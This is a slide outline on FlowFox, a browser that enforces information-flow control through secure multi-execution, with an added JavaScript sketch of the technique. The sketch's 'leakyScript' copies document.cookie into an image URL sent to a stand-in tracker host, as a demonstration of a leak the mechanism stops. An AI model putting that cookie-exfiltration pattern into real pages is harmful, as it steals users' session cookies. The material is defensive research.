FLOWFOX A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL.


ROADMAP
1. Background
2. Threat Model
3. Design
4. Security Policies
5. Implementation
6. Evaluation

BACKGROUND
The same-origin policy (SOP) has holes
1. Examples to bypass SOP
2. More powerful security enforcement mechanisms are required.
XMLHttpRequest ?

BACKGROUND
Information flow control
Any program can be seen as a machine with inputs and outputs. Inputs can be classified as high-credential inputs and low-credential inputs. The same holds for outputs.

BACKGROUND
Example of information flow analysis
High input: document.getElementById('email.input').text
Low output: *.src=*

BACKGROUND
Noninterference
A program is defined to be noninterferent if its outputs cannot be influenced by inputs at a higher security level than their own.
Termination-insensitive noninterference
1. A version of noninterference.
2. Under the assumption that a program always terminates normally, information is only disclosed by the program when it terminates.
3. Many existing tools can effectively check a program as long as the assumption holds.

BACKGROUND
Termination-insensitive noninterference vs. termination-sensitive noninterference

BACKGROUND
In the context of web security
Many state-of-the-art information flow systems can detect the information leak in this case.

BACKGROUND
Timing-insensitive noninterference
Assumption: the execution result does not depend on the execution time.

BACKGROUND
Secure Multi-Execution (SME) ([18])
1. An information flow control enforcement mechanism
2. As its name suggests, secure multi-execution executes a program multiple times, once for each security level.
3. The SME regime guarantees noninterference
4. FlowFox implements SME

BACKGROUND
Secure Multi-Execution Rule
[Figure: Image.src, Document.cookie, Image.width]

BACKGROUND
Example of Secure Multi-Execution

BACKGROUND
Secure Multi-Execution
Pros:
1. Secure multi-execution is sound
2. Secure multi-execution is precise
Cons:
1. Cost in CPU time and memory use

THREAT MODEL
Examples
1. Session Hijacking
2. Malicious Advertisements (Plugins)
3. History Sniffing and Behavior Tracking

FLOWFOX DESIGN
Two Design Alternatives
1. Multi-execute the entire browser:
   1. Easy to implement
   2. Too coarse-grained and imprecise

FLOWFOX DESIGN
Two Design Alternatives
2. Multi-execute the web scripts (FlowFox)
   1. Treat all interactions with the browser API as inputs and outputs
   2. Fine-grained
   3. Hard to implement

SECURITY POLICIES
1. Policies are specified for the DOM API
2. A FlowFox policy specifies two things
   1. Security levels for DOM APIs
   2. A default value for each DOM API call
3. Policy Rule

SECURITY POLICIES
4. Examples
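
Added example (not from the original slides or the FlowFox code base): a minimal two-level secure multi-execution of one script, driven by a policy that gives each API call a security level and a default value, as the Secure Multi-Execution and Security Policies slides describe. The policy table, API names, sample cookie and URL are constructed assumptions, and the two runs happen sequentially (low first) rather than under a real SME scheduler.

```javascript
// Added illustration of secure multi-execution (SME) with two levels.
// The policy table, API names and values are assumptions for this sketch;
// this is not FlowFox's real policy syntax.
const LOW = 0, HIGH = 1;

// Policy: a security level and a default value for each API call.
const policy = {
  'document.cookie': { level: HIGH, dflt: '' },
  'image.width':     { level: LOW,  dflt: 0 },
  'image.src=':      { level: LOW,  dflt: undefined },
};

// Constructed stand-in for the browser: performs calls, logs network effects.
function makeBrowser() {
  const effects = [];
  const real = {
    'document.cookie': () => 'SESSIONID=constructed-secret',
    'image.width':     () => 120,
    'image.src=':      (url) => { effects.push(url); },
  };
  return { effects, perform: (name, arg) => real[name](arg) };
}

// Run `script` once per level. Each run sees the API through the SME rules:
//  - call level above the run's level: not performed, default value returned
//  - call level equal to the run's level: performed for real, result recorded
//  - call level below the run's level: not performed again, recorded result reused
function secureMultiExecute(script, browser) {
  const recorded = {};               // results keyed by call name and call index
  for (const level of [LOW, HIGH]) { // low run first so the high run can reuse it
    const seen = {};
    const api = (name, arg) => {
      const rule = policy[name];
      if (rule.level > level) return rule.dflt;
      const key = `${name}#${seen[name] = (seen[name] || 0) + 1}`;
      if (rule.level === level) recorded[key] = browser.perform(name, arg);
      return recorded[key];
    };
    script(api);
  }
  return browser.effects;
}

// Constructed script: copies the cookie into an image URL (high input, low output).
const leakyScript = (api) => {
  const w = api('image.width');
  const c = encodeURIComponent(api('document.cookie'));
  api('image.src=', `http://tracker.example/p.gif?w=${w}&c=${c}`);
};
```

Only the low run performs the image load, and that run only ever saw the default cookie value, so the request goes out with an empty `c` parameter while the page still receives the real image width.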

IMPLEMENTATION
1. Implemented on top of Mozilla Firefox and consists of about 1400 new lines of C/C++ code
2. SME-aware JavaScript Engine
   1. JSContext has a security level field
   2. Each property of JSObject has a security level field
   3. Only properties with the same security level as the coordinating JSContext are visible
3. SME/IO Process
4. Event Handling
   1. Low events will be handled by both the low and high executions
   2. High events will only be handled by the high execution.

EVALUATION
1. Security
   1. Is FlowFox noninterferent?
      1. Two reasons FlowFox could fail to be noninterferent
         1. The assumptions underlying the soundness proof are violated
         2. Implementation-level vulnerabilities exist
      2. Hard to guarantee.

EVALUATION
1. Security
   1. Examples of mitigating threats
      1. Leaking Session Cookies
      2. History Sniffing
      3. Tracking Libraries

EVALUATION
2. Compatibility
   1. Two regular Firefox browsers and one FlowFox browser
   2. A simple policy that makes reading document.cookie high
   3. A crawler dumps a screenshot of each of the three browsers to a bitmap
   4. First, compare the bitmaps belonging to the two Firefox browsers and find the area that is the same (the unmasked area).
   5. Second, compare the unmasked areas of the bitmaps belonging to the Firefox and FlowFox browsers.

EVALUATION
3. Micro Benchmark
   1. Measure the overhead of executing pure JavaScript.
   2. Measure the overhead for I/O-intensive applications.
   3. Executing pure JavaScript incurs a large overhead
   4. The I/O test shows only a negligible overhead

EVALUATION
4. Macro Benchmark
   1. Measure the impact on the latency perceived by a browser user
   2. The results show that the user-perceived latency for real-life web applications is acceptable

EVALUATION
5. Memory Benchmark
   1. Measuring 500 different websites
   2. FlowFox incurred a memory overhead of 88%